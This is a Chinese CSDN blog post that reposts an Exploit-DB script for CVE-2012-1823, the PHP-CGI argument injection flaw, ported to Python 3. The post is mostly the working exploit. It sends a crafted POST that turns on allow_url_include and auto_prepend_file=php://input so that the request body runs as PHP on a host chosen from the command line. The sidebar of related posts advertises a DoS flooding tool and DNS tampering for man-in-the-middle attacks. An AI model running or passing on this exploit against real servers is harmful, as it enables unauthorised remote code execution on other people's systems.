Cve-2012-1823 PHP CGI Argument Injection Exploit

最新推荐文章于 2024-06-15 16:16:26 发布
最新推荐文章于 2024-06-15 16:16:26 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: python 工具源码 文章标签: cgi php include stream python date
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yatere/article/details/7546215
版权

原帖代码地址为:

http://www.exploit-db.com/exploits/18836/

由于其实为py2.x版本服务的,所以我将代码改为py3了。

代码如下:

######################################################################################
# Exploit Title: Cve-2012-1823 PHP CGI Argument Injection Exploit
# Date: May 4, 2012
# Author: rayh4c[0x40]80sec[0x2e]com
# Exploit Discovered by wofeiwo[0x40]80sec[0x2e]com
# Edited By Yatere for Python 3.x 
######################################################################################

import socket
import sys

def cgi_exploit():
        pwn_code = '''<?php phpinfo();?>''' 
        post_Length = len(pwn_code)
        http_raw="""POST /?-dallow_url_include%%3don+-dauto_prepend_file%%3dphp://input HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded
Content-Length: %s

%s
""" %(HOST , post_Length ,pwn_code)
        print (http_raw)
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((HOST, int(PORT)))
            sock.send(http_raw.encode())
            data = sock.recv(10000)
            print (data.decode())
            sock.close()
        except socket.error as msg:
            sys.stderr.write("[ERROR] %s\n" % msg[1])
            sys.exit(1)
               
if __name__ == '__main__':
        try:
            HOST = sys.argv[1]
            PORT = sys.argv[2]
            cgi_exploit()
        except IndexError:
            print ('[+]Usage: cgi_test.py site.com 80')
            sys.exit(-1)


Yatere
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[Vulhub](CVE-2012-1823PHP-CGI远程代码执行漏洞
weixin_45605352的博客
03-28 1614
首先理解一下CGI的概念: CGICGI 全称是“公共网关接口”(Common Gateway Interface),HTTP 服务器与你的或其它机器上的程序进行“交谈”的一种工具,其程序须运行在网络服务器上。 CGI 可以用任何一种语言编写,只要这种语言具有标准输入、输出和环境变量。如 PHP, Perl, Tcl 等。 作用: CGI是一种根据请求信息动态产生回应内容的技术。 通过CGI,Web服务器可以根据请求不同启动不同的外部程序,并将请求内容转发给该程序,在程序执行结束后,将执行结果作为回应返
漏洞复现之CVE-2012-1823PHP-CGI远程代码执行)
最新发布
ASD830的博客
06-18 399
发现flag,查看即可得到flag{32a52c19-c1db-4479-ac54-ab59d8d45977}可以发现其php版本为5.4.1,而且可以看到一个cve字样:cve20121823。得到index.php和info.php,使用cat命令查看一下index.php。提示我们这里没什么东西,我们猜测flag可能在根目录下,目录穿越一下。接着我们使用-d 指定配置项,这里我们可以结合post请求执行命令。发现info.php,直接访问/info.php。首先我们使用-s命令查看一下源代码。
XAMPP PHP-CGI 远程代码执行漏洞(CVE-2024-4577)
【Rainbow Network Technology co., LTD】
06-15 478
2024 年 6 月 7 日,推特安全上 orange 公开了其漏洞 CVE-2024-4577 细节,并且 PHP 官方已修复该漏洞。该漏洞仅适用于 php 版本为 8.1 < 8.1.29,PHP 8.2 < 8.2.20,PHP 8.3 < 8.3.8,同时在 php-cgi 模式下运行 php,并且运行在 windows 平台,且使用语系为繁体中文 950、日文 932、简体中文 936 等。
CVE-2012-1823PHP-CGI RCE)的PoC及技术挑战
Yatere的天平秤
05-07 2072
国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/  粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。  另外关于RC
Metasploitable2靶机之第十篇--PHP CGI参数注入执行漏洞(cve-2012-1823
千寻的博客
04-03 1714
文章目录环境原理漏洞利用摘抄 环境 原理 漏洞利用 摘抄
metasploit中php_cgi,PHP CGI Argument Injection - 婕忔礊鍒╃敤 - 0day,Exploit,Shellcode
weixin_39959298的博客
03-18 140
### $Id$##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and...
php cgi 执行,PHP-CGI远程任意代码执行漏洞
weixin_42525672的博客
03-10 558
PHP-CGI远程任意代码执行漏洞发布日期:2012-05-03更新日期:2012-05-04受影响系统:PHP PHP描述:--------------------------------------------------------------------------------CVE ID: CVE-2012-1823PHP是一种HTML内嵌式的语言,PHP与微软的ASP颇有几分相似,都是...
php cgi源码,PHP-CGI远程任意代码执行漏洞
weixin_36482113的博客
03-09 548
### $Id$##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and...
PHP CGI Argument Injection
cnbird's blog
05-06 1763
CVE ID: CVE-2012-1823 PHP是一种HTML内嵌式的语言,PHP与微软的ASP颇有几分相似,都是一种在服务器端执行的嵌入HTML文档的脚本语言,语言的风格有类似于C语言,现在被很多的网站编程人员广泛的运用。可以被各种Web服务器以多种方式调用,实现动态网页的功能。 PHP处理参数的传递时存在漏洞,在特定的配置情况下,远程攻击者可能利用此漏洞在服务器上获取脚本源码或执
phpMyadmin /scripts/setup.php Remote Code Injection && Execution CVE-2009-1151
weixin_30787531的博客
10-22 118
目录 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 Insufficient output sanitizing when generating configuration file phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL phpMyAdmin的Setup脚本...
oracle 11.2.0.1 CVE-2012-1675 补丁:p12880299_112010_Linux-x86-64.zip
01-19
Oracle 11.2.0.1 CVE-2012-1675 补丁:p12880299_112010_Linux-x86-64.zip 是一个针对Oracle数据库系统的重要安全更新。这个补丁主要解决了一个在Oracle 11.2.0.1版本中的严重安全漏洞,该漏洞被标记为CVE-2012-1675...
Oracle Database Server 'TNS Listener'远程数据投毒漏洞(CVE-2012-1675)的解决文档
05-25
链接:http://www.oracle.com/technetwork/topics/security/alert-cve-2012-1675-1608180.html 根据此链接得到解决方法: ? 1234 SolutionRecommendations for protecting against this vulnerability can be found ...
CVE-2017-8759-Exploit-sample-master
07-05
CVE-2017-8759-Exploit-sample-master,漏洞示例代码。
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
CVE-2019-0708-ExpLoit.zip
05-15
CVE-2019-0708-exploit,针对远程桌面服务(以前称为终端服务)的关键远程执行代码漏洞CVE-2019-0708,以下是Windows版利用工具,以及python版利用工具
python 多线程tcp udp发包 Dos工具。
Yatere的天平秤
04-17 7322
现在肉鸡上面linux越来越多,都默认安装了python,有时候没有工具的时候可以自己写一个: 下面是支持 tcp和udp的python的发包代码: import socket,sys,threading if len(sys.argv)!=4: print('使用方法:\n'+sys.argv[0],'目标ip','协议[tcp | udp]','线程数')
icmp (http) 隧道技术
Yatere的天平秤
04-18 3513
实验环境如下: 服务器IP:61.183.254.254 客户机IP:192.168.1.105 Http代理服务器:202.103.24.68  端口:8080 现象:    客户机可以ping得通外网服务器,但是却无法上网,出口过滤tcp和udp。 目的: 客户机可以正常上网。 服务器: C:\>ptunnel.exe -v 4 -c "\Device\NPF_{
dns服务器 、dns中间人篡改服务器
Yatere的天平秤
01-30 3253
软件介绍:  本身为独立执行程序,跨平台,可以充当正常dns服务器。默认情况下,本程序只篡改MX(邮件交换记录)为特定主机。 作用: 本软件 与 本博客前文中的 smtp 中继监控服务器程序 结合来实施攻击,特别在内网中。 其他: 如果需要实现高级的基于特定域名的篡改,修改代码即可。 package main import ( "fmt" "github.
python 自动采集域名whois 信息。
Yatere的天平秤
03-06 3047
以前写了一个基于socket的,但是经常要连接不同whois服务器,有些信息还不全。 这次直接基于中国站长网,由于目标页面有js动态操作,所以只能使用pam模块了。 下面是介绍: 吧域名每行一个的写入脚本所在程序目录下的dns.txt,然后运行以下脚本。 程序自动为每个域名生成单独htm文件,放于同目录下。 pam 和 BeautifulSoup 参考我博客可以找到 B
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值